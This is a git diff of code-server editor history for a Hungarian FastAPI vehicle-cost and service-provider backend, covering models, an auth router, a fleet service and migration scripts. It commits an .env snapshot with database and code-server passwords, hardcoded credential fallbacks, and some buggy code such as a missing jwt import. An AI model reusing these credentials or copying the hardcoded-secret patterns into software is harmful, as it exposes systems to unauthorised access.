+{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/services/notification_service.py","entries":[{"id":"ySrz.py","timestamp":1769041693523}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/5144c62f/ySrz.py b/code-server-config/data/User/History/5144c62f/ySrz.py new file mode 100755 index 0000000..9d7dc92 --- /dev/null +++ b/code-server-config/data/User/History/5144c62f/ySrz.py @@ -0,0 +1,14 @@ +from datetime import datetime, timedelta +from sqlalchemy import select +from app.models.user import User +from app.models.vehicle import Vehicle +from app.core.email import send_expiry_notification + +async def check_expiring_documents(db: AsyncSession, background_tasks: BackgroundTasks): + # Példa: Műszaki vizsga lejárata 30 napon belül + threshold = datetime.now().date() + timedelta(days=30) + result = await db.execute( + select(Vehicle, User).join(User).where(Vehicle.mot_expiry_date <= threshold) + ) + for vehicle, user in result.all(): + send_expiry_notification(background_tasks, user.email, f"Műszaki vizsga ({vehicle.license_plate})") \ No newline at end of file diff --git a/code-server-config/data/User/History/55969fe3/JlPL.py b/code-server-config/data/User/History/55969fe3/JlPL.py new file mode 100755 index 0000000..cda5b6c --- /dev/null +++ b/code-server-config/data/User/History/55969fe3/JlPL.py @@ -0,0 +1,56 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def expand_categories(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("📥 Új Főkategóriák beszúrása...") + parents = [ + ('EQUIPMENT', '🛠️ Felszerelés / Extrák', 25), # Vételár után + ('OPERATIONAL', '🅿️ Üzemeltetés / Út', 15), # Tankolás után + ('FINE', '👮 Bírság / Büntetés', 90) + ] + for p in parents: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, sort_order) VALUES (:c, :n, :s) ON CONFLICT (code) DO NOTHING"), {"c": p[0], "n": p[1], "s": p[2]}) + + print("📥 Új Alkategóriák beszúrása...") + children = [ + # Felszerelés (EQUIPMENT) + ('EQUIP_SHELVING', 'Raktérburkolat / Polcrendszer', 'EQUIPMENT'), + ('EQUIP_BRANDING', 'Matricázás / Fóliázás', 'EQUIPMENT'), + ('EQUIP_TOWBAR', 'Vonóhorog / Tetőcsomagtartó', 'EQUIPMENT'), + ('EQUIP_SAFETY', 'Kötelező tartozékok (Eü. csomag)', 'EQUIPMENT'), + ('EQUIP_GPS', 'GPS / Nyomkövető hardver', 'EQUIPMENT'), + ('EQUIP_WINTER_TIRE', 'Téli gumi szett (Beszerzés)', 'EQUIPMENT'), + + # Üzemeltetés (OPERATIONAL) + ('OP_PARKING', 'Parkolás', 'OPERATIONAL'), + ('OP_TOLL', 'Útdíj / Matrica / Behajtás', 'OPERATIONAL'), + ('OP_WASH', 'Mosás / Kozmetika', 'OPERATIONAL'), + ('OP_ADBLUE', 'AdBlue', 'OPERATIONAL'), + ('OP_EV_CHARGE', 'Elektromos töltés', 'OPERATIONAL'), + ('OP_STORAGE', 'Gumi hotel / Tárolás', 'OPERATIONAL'), + + # Bírság (FINE) + ('FINE_SPEEDING', 'Gyorshajtás', 'FINE'), + ('FINE_PARKING', 'Parkolási bírság', 'FINE'), + ('FINE_ADMIN', 'Közigazgatási bírság', 'FINE') + ] + for c in children: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, parent_code) VALUES (:c, :n, :p) ON CONFLICT (code) DO NOTHING"), {"c": c[0], "n": c[1], "p": c[2]}) + + print("✅ KÉSZ! A költséglista most már teljeskörű.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(expand_categories()) \ No newline at end of file diff --git a/code-server-config/data/User/History/55969fe3/entries.json b/code-server-config/data/User/History/55969fe3/entries.json new file mode 100755 index 0000000..0dc6cca --- /dev/null +++ b/code-server-config/data/User/History/55969fe3/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/update_cost_categories.py","entries":[{"id":"JlPL.py","timestamp":1768948688691}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/563f6285/entries.json b/code-server-config/data/User/History/563f6285/entries.json new file mode 100755 index 0000000..2e9d793 --- /dev/null +++ b/code-server-config/data/User/History/563f6285/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/schemas/user.py","entries":[{"id":"iogF.py","timestamp":1769035839738}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/563f6285/iogF.py b/code-server-config/data/User/History/563f6285/iogF.py new file mode 100755 index 0000000..e8bc247 --- /dev/null +++ b/code-server-config/data/User/History/563f6285/iogF.py @@ -0,0 +1,19 @@ +from pydantic import BaseModel, ConfigDict, EmailStr +from typing import Optional +from datetime import datetime + +class UserBase(BaseModel): + email: EmailStr + full_name: Optional[str] = None + +class UserCreate(UserBase): + password: str + +class UserResponse(UserBase): + id: int + is_active: bool + reputation_score: int # Ez a legfontosabb új mező! + is_superuser: bool + created_at: datetime + + model_config = ConfigDict(from_attributes=True) diff --git a/code-server-config/data/User/History/5bff933a/entries.json b/code-server-config/data/User/History/5bff933a/entries.json new file mode 100755 index 0000000..07e4aef --- /dev/null +++ b/code-server-config/data/User/History/5bff933a/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/api/v1/auth.py","entries":[{"id":"j30u.py","timestamp":1769041576002}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/5bff933a/j30u.py b/code-server-config/data/User/History/5bff933a/j30u.py new file mode 100755 index 0000000..508f32a --- /dev/null +++ b/code-server-config/data/User/History/5bff933a/j30u.py @@ -0,0 +1,73 @@ +from fastapi import APIRouter, Depends, HTTPException, status, BackgroundTasks +from fastapi.security import OAuth2PasswordRequestForm +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select +from datetime import timedelta + +from app.db.session import get_db +from app.models.user import User +from app.core.security import get_password_hash, verify_password, create_access_token +from app.core.email import send_verification_email +import os + +router = APIRouter() + +@router.post("/register", status_code=status.HTTP_201_CREATED) +async def register( + background_tasks: BackgroundTasks, + email: str, password: str, full_name: str, + db: AsyncSession = Depends(get_db) +): + # Email ellenőrzés + res = await db.execute(select(User).where(User.email == email)) + if res.scalars().first(): + raise HTTPException(status_code=400, detail="Ez az email már foglalt") + + new_user = User( + email=email, + password_hash=get_password_hash(password), + full_name=full_name, + is_active=False # Aktiválásig inaktív + ) + db.add(new_user) + await db.commit() + + # Aktiváló token (egyszerűség kedvéért most a JWT-t használjuk tokenként) + token = create_access_token(data={"sub": email}, expires_delta=timedelta(hours=24)) + send_verification_email(background_tasks, email, token) + + return {"message": "Sikeres regisztráció! Ellenőrizd az email fiókodat az aktiváláshoz."} + +@router.get("/verify/{token}") +async def verify_account(token: str, db: AsyncSession = Depends(get_db)): + try: + payload = jwt.decode(token, os.getenv("SECRET_KEY"), algorithms=[os.getenv("ALGORITHM")]) + email = payload.get("sub") + except: + raise HTTPException(status_code=400, detail="Érvénytelen vagy lejárt token") + + result = await db.execute(select(User).where(User.email == email)) + user = result.scalars().first() + if not user: + raise HTTPException(status_code=404, detail="Felhasználó nem található") + + user.is_active = True + await db.commit() + return {"message": "Fiók sikeresen aktiválva!"} + +@router.post("/login") +async def login( + form_data: OAuth2PasswordRequestForm = Depends(), + db: AsyncSession = Depends(get_db) +): + result = await db.execute(select(User).where(User.email == form_data.username)) + user = result.scalars().first() + + if not user or not verify_password(form_data.password, user.password_hash): + raise HTTPException(status_code=400, detail="Hibás email vagy jelszó") + + if not user.is_active: + raise HTTPException(status_code=400, detail="Kérjük, aktiváld a fiókodat az emailben küldött linken") + + access_token = create_access_token(data={"sub": user.email}) + return {"access_token": access_token, "token_type": "bearer"} \ No newline at end of file diff --git a/code-server-config/data/User/History/639c2122/entries.json b/code-server-config/data/User/History/639c2122/entries.json new file mode 100755 index 0000000..b84c0fa --- /dev/null +++ b/code-server-config/data/User/History/639c2122/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/update_docs.py","entries":[{"id":"u4bN.py","timestamp":1768946792839}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/639c2122/u4bN.py b/code-server-config/data/User/History/639c2122/u4bN.py new file mode 100755 index 0000000..0ff9347 --- /dev/null +++ b/code-server-config/data/User/History/639c2122/u4bN.py @@ -0,0 +1,26 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def add_doc_column(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("📄 Dokumentum oszlop hozzáadása a Costs táblához...") + await conn.execute(text(""" + ALTER TABLE data.costs + ADD COLUMN IF NOT EXISTS document_url VARCHAR(255); + """)) + print("✅ KÉSZ! Mehetnek a fájlok.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(add_doc_column()) \ No newline at end of file diff --git a/code-server-config/data/User/History/6ca6cf1a/ZFcJ.py b/code-server-config/data/User/History/6ca6cf1a/ZFcJ.py new file mode 100755 index 0000000..a8d3baf --- /dev/null +++ b/code-server-config/data/User/History/6ca6cf1a/ZFcJ.py @@ -0,0 +1,114 @@ +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, func, desc +from app.models.vehicle import Vehicle +from app.models.expense import VehicleEvent, ExpenseCategory +from app.models.social import ServiceProvider, SourceType, ModerationStatus +from app.schemas.fleet import EventCreate, TCOStats + +async def add_vehicle_event(db: AsyncSession, vehicle_id: int, event_data: EventCreate, user_id: int): + """ + Összetett logika esemény rögzítésére: + 1. Provider kezelés (DIY vs Existing vs New Ad-Hoc) + 2. Odometer integritás ellenőrzés + 3. Mentés és Jármű frissítés + """ + + # 1. Jármű ellenőrzése + vehicle_res = await db.execute(select(Vehicle).where(Vehicle.id == vehicle_id)) + vehicle = vehicle_res.scalars().first() + if not vehicle: + return {"error": "Vehicle not found"} + + # 2. Provider Logika + final_provider_id = event_data.provider_id + + if event_data.is_diy: + # Ha DIY, akkor nincs provider + final_provider_id = None + if not event_data.description: + event_data.description = "Saját javítás (DIY)" + + elif event_data.provider_name and not final_provider_id: + # Ha nevet kaptunk, de ID-t nem -> Keresés vagy Létrehozás + # Megpróbáljuk megkeresni név alapján (case insensitive) + provider_res = await db.execute(select(ServiceProvider).where(func.lower(ServiceProvider.name) == event_data.provider_name.lower())) + existing_provider = provider_res.scalars().first() + + if existing_provider: + final_provider_id = existing_provider.id + else: + # Nem létezik -> Létrehozunk egy "Fantom" szolgáltatót + new_provider = ServiceProvider( + name=event_data.provider_name, + address="Unknown (User Generated)", + status=ModerationStatus.pending, # Ellenőrzésre vár + source=SourceType.manual, + added_by_user_id=user_id + ) + db.add(new_provider) + await db.flush() # Hogy kapjunk ID-t + final_provider_id = new_provider.id + print(f"--- INFO: Created Ad-Hoc Provider: {event_data.provider_name} (ID: {final_provider_id})") + + # 3. Odometer Logika (Biztonság) + anomaly_detected = False + + if event_data.odometer_value < vehicle.current_odometer: + # Figyelmeztetés: Csökkent a kilométerállás! + anomaly_detected = True + print(f"--- WARN: Odometer rollback detected for Vehicle {vehicle_id}!") + + # 4. Esemény mentése + new_event = VehicleEvent( + vehicle_id=vehicle_id, + event_type=event_data.event_type, + date=event_data.date, + odometer_value=event_data.odometer_value, + odometer_anomaly=anomaly_detected, + cost_amount=event_data.cost_amount, + description=event_data.description, + is_diy=event_data.is_diy, + service_provider_id=final_provider_id + ) + + db.add(new_event) + + # 5. Jármű frissítése (Ha nőtt a km, update-eljük a current-et) + if event_data.odometer_value > vehicle.current_odometer: + vehicle.current_odometer = event_data.odometer_value + + await db.commit() + await db.refresh(new_event) + return new_event + +async def calculate_tco(db: AsyncSession, vehicle_id: int) -> TCOStats: + """Teljes költség elemzés (TCO)""" + + # Költségek lekérése kategóriánként + result = await db.execute( + select(VehicleEvent.event_type, func.sum(VehicleEvent.cost_amount)) + .where(VehicleEvent.vehicle_id == vehicle_id) + .group_by(VehicleEvent.event_type) + ) + + breakdown = {row[0]: row[1] for row in result.all()} + total_cost = sum(breakdown.values()) + + # Km futás számítás + vehicle_res = await db.execute(select(Vehicle).where(Vehicle.id == vehicle_id)) + vehicle = vehicle_res.scalars().first() + + km_driven = 0 + cost_per_km = 0.0 + + if vehicle: + km_driven = max(0, vehicle.current_odometer - vehicle.initial_odometer) + if km_driven > 0: + cost_per_km = total_cost / km_driven + + return TCOStats( + vehicle_id=vehicle_id, + total_cost=total_cost, + breakdown=breakdown, + cost_per_km=round(cost_per_km, 2) + ) \ No newline at end of file diff --git a/code-server-config/data/User/History/6ca6cf1a/entries.json b/code-server-config/data/User/History/6ca6cf1a/entries.json new file mode 100755 index 0000000..cd77118 --- /dev/null +++ b/code-server-config/data/User/History/6ca6cf1a/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/services/fleet_service.py","entries":[{"id":"ZFcJ.py","timestamp":1769038171956}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/71ceecfb/entries.json b/code-server-config/data/User/History/71ceecfb/entries.json new file mode 100755 index 0000000..e93c1b2 --- /dev/null +++ b/code-server-config/data/User/History/71ceecfb/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/.env","entries":[{"id":"khcD","timestamp":1769029493214}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/71ceecfb/khcD b/code-server-config/data/User/History/71ceecfb/khcD new file mode 100755 index 0000000..8636824 --- /dev/null +++ b/code-server-config/data/User/History/71ceecfb/khcD @@ -0,0 +1,22 @@ +# --- ADATBÁZIS BEÁLLÍTÁSOK --- +# Itt az általad megadott adatokat aszinkron formátumba öntöttük a FastAPI-hoz +DATABASE_URL="postgresql+asyncpg://://service_finder_app:AppSafePass_2026@postgres-db:5432/service_finder" + +# --- REDIS BEÁLLÍTÁSOK --- +# A Redis konténer neve a docker-compose alapján 'redis' +REDIS_URL=redis://redis:6379/0 + +# --- BIZTONSÁG (JWT) --- +# A titkos kulcsot javaslom lecserélni egy egyedire (pl. openssl rand -hex 32) +SECRET_KEY=CHANGE_ME_LONG_RANDOM +ALGORITHM=HS256 + +# Időtartamok percben és napban +ACCESS_TOKEN_EXPIRE_MINUTES=15 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# --- E-MAIL (Későbbi aktiváláshoz) --- +# MAIL_API_KEY=SG.példa_kulcs +# MAIL_FROM=info@profibot.hu + +CODE_SERVER_PASSWORD=Megeszemalakapom11 diff --git a/code-server-config/data/User/History/97f3a5f/IBcb.py b/code-server-config/data/User/History/97f3a5f/IBcb.py new file mode 100755 index 0000000..fbbf5ff --- /dev/null +++ b/code-server-config/data/User/History/97f3a5f/IBcb.py @@ -0,0 +1,9 @@ +from sqlalchemy.ext.asyncio import AsyncAttrs +from sqlalchemy.orm import DeclarativeBase + +class Base(AsyncAttrs, DeclarativeBase): + """ + Base class for all SQLAlchemy models. + Includes AsyncAttrs to support async attribute access (lazy loading). + """ + pass \ No newline at end of file diff --git a/code-server-config/data/User/History/97f3a5f/entries.json b/code-server-config/data/User/History/97f3a5f/entries.json new file mode 100755 index 0000000..4a1bd43 --- /dev/null +++ b/code-server-config/data/User/History/97f3a5f/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/db/base.py","entries":[{"id":"IBcb.py","timestamp":1769025519272}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/e7633ef/9eTf.py b/code-server-config/data/User/History/e7633ef/9eTf.py new file mode 100755 index 0000000..7d9f19f --- /dev/null +++ b/code-server-config/data/User/History/e7633ef/9eTf.py @@ -0,0 +1,71 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Text, UniqueConstraint +from app.db.base import Base +from datetime import datetime + +# Enums (már schema="data" beállítással a biztonságért) +class ModerationStatus(str, enum.Enum): + pending = "pending" + approved = "approved" + rejected = "rejected" + +class SourceType(str, enum.Enum): + manual = "manual" + ocr = "ocr" + api_import = "import" + +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + address = Column(String, nullable=False) + category = Column(String) + + status = Column(Enum(ModerationStatus, schema="data", name="moderation_status_enum"), default=ModerationStatus.pending, nullable=False) + source = Column(Enum(SourceType, schema="data", name="source_type_enum"), default=SourceType.manual, nullable=False) + + # --- ÚJ MEZŐ --- + validation_score = Column(Integer, default=0) # A közösségi szavazatok összege + # --------------- + + evidence_image_path = Column(String, nullable=True) + added_by_user_id = Column(Integer, ForeignKey("data.users.id")) + created_at = Column(DateTime, default=datetime.utcnow) + +class Vote(Base): + __tablename__ = "votes" + __table_args__ = ( + UniqueConstraint('user_id', 'provider_id', name='uq_user_provider_vote'), + {"schema": "data"} + ) + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + provider_id = Column(Integer, ForeignKey("data.service_providers.id"), nullable=False) + vote_value = Column(Integer, nullable=False) # +1 vagy -1 + +class Competition(Base): + __tablename__ = "competitions" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + name = Column(String, nullable=False) # Pl: "Januári Feltöltő Verseny" + description = Column(Text) + start_date = Column(DateTime, nullable=False) + end_date = Column(DateTime, nullable=False) + is_active = Column(Boolean, default=True) + +class UserScore(Base): + __tablename__ = "user_scores" + __table_args__ = ( + UniqueConstraint('user_id', 'competition_id', name='uq_user_competition_score'), + {"schema": "data"} + ) + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + competition_id = Column(Integer, ForeignKey("data.competitions.id")) + points = Column(Integer, default=0) + last_updated = Column(DateTime, default=datetime.utcnow) \ No newline at end of file diff --git a/code-server-config/data/User/History/e7633ef/byJh.py b/code-server-config/data/User/History/e7633ef/byJh.py new file mode 100755 index 0000000..e97342b --- /dev/null +++ b/code-server-config/data/User/History/e7633ef/byJh.py @@ -0,0 +1,57 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Text +from sqlalchemy.orm import relationship +from app.core.database import Base +from datetime import datetime + +# Enums +class ModerationStatus(str, enum.Enum): + pending = "pending" + approved = "approved" + rejected = "rejected" + +class SourceType(str, enum.Enum): + manual = "manual" + ocr = "ocr" + api_import = "import" + +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + address = Column(String, nullable=False) + category = Column(String) + + # --- JAVÍTÁS ITT: schema="data" hozzáadása --- + # Megmondjuk, hogy az Enum típus a 'data' sémába kerüljön + status = Column(Enum(ModerationStatus, schema="data", name="moderation_status_enum"), default=ModerationStatus.pending, nullable=False) + source = Column(Enum(SourceType, schema="data", name="source_type_enum"), default=SourceType.manual, nullable=False) + # --------------------------------------------- + + evidence_image_path = Column(String, nullable=True) + + added_by_user_id = Column(Integer, ForeignKey("data.users.id")) + created_at = Column(DateTime, default=datetime.utcnow) + +class Competition(Base): + __tablename__ = "competitions" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + name = Column(String, nullable=False) + description = Column(Text) + start_date = Column(DateTime, nullable=False) + end_date = Column(DateTime, nullable=False) + is_active = Column(Boolean, default=True) + +class UserScore(Base): + __tablename__ = "user_scores" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + competition_id = Column(Integer, ForeignKey("data.competitions.id")) + points = Column(Integer, default=0) + last_updated = Column(DateTime, default=datetime.utcnow) \ No newline at end of file diff --git a/code-server-config/data/User/History/e7633ef/dmjc.py b/code-server-config/data/User/History/e7633ef/dmjc.py new file mode 100755 index 0000000..0f58764 --- /dev/null +++ b/code-server-config/data/User/History/e7633ef/dmjc.py @@ -0,0 +1,57 @@ +import enum +from datetime import datetime +from sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime, Enum, Text +from sqlalchemy.orm import relationship +from app.db.base import Base + +# --- Enums for Logic Control --- +class ModerationStatus(str, enum.Enum): + PENDING = "pending" + APPROVED = "approved" + REJECTED = "rejected" + +class SourceType(str, enum.Enum): + MANUAL = "manual" # User uploaded + OCR = "ocr" # Extracted from a receipt + IMPORT = "import" # System import + +# --- Models --- +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + address = Column(String) + + # Moderation Logic + status = Column(Enum(ModerationStatus), default=ModerationStatus.PENDING, nullable=False) + source = Column(Enum(SourceType), default=SourceType.MANUAL, nullable=False) + + # Verification Data + evidence_image_path = Column(String, nullable=True) # Path to MinIO object + + # Audit + added_by_user_id = Column(Integer, ForeignKey("data.users.id")) + created_at = Column(DateTime, default=datetime.utcnow) + +class Competition(Base): + __tablename__ = "competitions" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + description = Column(Text, nullable=True) + + start_date = Column(DateTime, nullable=False) + end_date = Column(DateTime, nullable=False) + is_active = Column(Boolean, default=True) + +class UserScore(Base): + __tablename__ = "user_scores" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + competition_id = Column(Integer, ForeignKey("data.competitions.id")) + points = Column(Integer, default=0) \ No newline at end of file diff --git a/code-server-config/data/User/History/e7633ef/entries.json b/code-server-config/data/User/History/e7633ef/entries.json new file mode 100755 index 0000000..4a04ccb --- /dev/null +++ b/code-server-config/data/User/History/e7633ef/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/models/social.py","entries":[{"id":"dmjc.py","timestamp":1769025543558},{"id":"byJh.py","timestamp":1769032091165},{"id":"vXRG.py","timestamp":1769032472402},{"id":"9eTf.py","timestamp":1769033781363}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/e7633ef/vXRG.py b/code-server-config/data/User/History/e7633ef/vXRG.py new file mode 100755 index 0000000..5ec5d05 --- /dev/null +++ b/code-server-config/data/User/History/e7633ef/vXRG.py @@ -0,0 +1,57 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Text +from sqlalchemy.orm import relationship +from app.db.base import Base +from datetime import datetime + +# Enums +class ModerationStatus(str, enum.Enum): + pending = "pending" + approved = "approved" + rejected = "rejected" + +class SourceType(str, enum.Enum): + manual = "manual" + ocr = "ocr" + api_import = "import" + +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + address = Column(String, nullable=False) + category = Column(String) + + # --- JAVÍTÁS ITT: schema="data" hozzáadása --- + # Megmondjuk, hogy az Enum típus a 'data' sémába kerüljön + status = Column(Enum(ModerationStatus, schema="data", name="moderation_status_enum"), default=ModerationStatus.pending, nullable=False) + source = Column(Enum(SourceType, schema="data", name="source_type_enum"), default=SourceType.manual, nullable=False) + # --------------------------------------------- + + evidence_image_path = Column(String, nullable=True) + + added_by_user_id = Column(Integer, ForeignKey("data.users.id")) + created_at = Column(DateTime, default=datetime.utcnow) + +class Competition(Base): + __tablename__ = "competitions" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + name = Column(String, nullable=False) + description = Column(Text) + start_date = Column(DateTime, nullable=False) + end_date = Column(DateTime, nullable=False) + is_active = Column(Boolean, default=True) + +class UserScore(Base): + __tablename__ = "user_scores" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + competition_id = Column(Integer, ForeignKey("data.competitions.id")) + points = Column(Integer, default=0) + last_updated = Column(DateTime, default=datetime.utcnow) \ No newline at end of file diff --git a/code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86/configuration.json b/code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86/configuration.json new file mode 100755 index 0000000..64c1350 --- /dev/null +++ b/code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86/configuration.json @@ -0,0 +1 @@ +{"content":{"settings":"{}","tasks":"{}","launch":"{}","mcp":"{}"}} \ No newline at end of file diff --git a/code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260/configuration.json b/code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260/configuration.json new file mode 100755 index 0000000..64c1350 --- /dev/null +++ b/code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260/configuration.json @@ -0,0 +1 @@ +{"content":{"settings":"{}","tasks":"{}","launch":"{}","mcp":"{}"}} \ No newline at end of file diff --git a/code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd/configuration.json b/code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd/configuration.json new file mode 100755 index 0000000..64c1350 --- /dev/null +++ b/code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd/configuration.json @@ -0,0 +1 @@ +{"content":{"settings":"{}","tasks":"{}","launch":"{}","mcp":"{}"}} \ No newline at end of file diff --git a/code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7/configuration.json b/code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7/configuration.json new file mode 100755 index 0000000..64c1350 --- /dev/null +++ b/code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7/configuration.json @@ -0,0 +1 @@ +{"content":{"settings":"{}","tasks":"{}","launch":"{}","mcp":"{}"}} \ No newline at end of file diff --git a/code-server-config/data/User/customBuiltinExtensionsCache.json b/code-server-config/data/User/customBuiltinExtensionsCache.json new file mode 100755 index 0000000..0637a08 --- /dev/null +++ b/code-server-config/data/User/customBuiltinExtensionsCache.json @@ -0,0 +1 @@ +[] \ No newline at end of file diff --git a/code-server-config/data/User/machineid b/code-server-config/data/User/machineid new file mode 100755 index 0000000..9d4c856 --- /dev/null +++ b/code-server-config/data/User/machineid @@ -0,0 +1 @@ +928b99e8-70e9-40fe-b135-2be4457f113f \ No newline at end of file diff --git a/code-server-config/data/User/settings.json b/code-server-config/data/User/settings.json new file mode 100755 index 0000000..b1ed5d4 --- /dev/null +++ b/code-server-config/data/User/settings.json @@ -0,0 +1,3 @@ +{ + "keyboard.layout": "0000040E" +} \ No newline at end of file diff --git a/code-server-config/data/User/systemExtensionsCache.json b/code-server-config/data/User/systemExtensionsCache.json new file mode 100755 index 0000000..0637a08 --- /dev/null +++ b/code-server-config/data/User/systemExtensionsCache.json @@ -0,0 +1 @@ +[] \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/state.json new file mode 100755 index 0000000..7e77f50 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"2476b0e5-bd9f-43c7-a353-87a142effbeb","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/state.json new file mode 100755 index 0000000..1562217 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"735b875e-acbc-43af-8bd8-40b3e0aeef99","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/state.json new file mode 100755 index 0000000..28a1834 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"cf80df56-9aa7-42c2-bf41-32a9267bae0a","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git 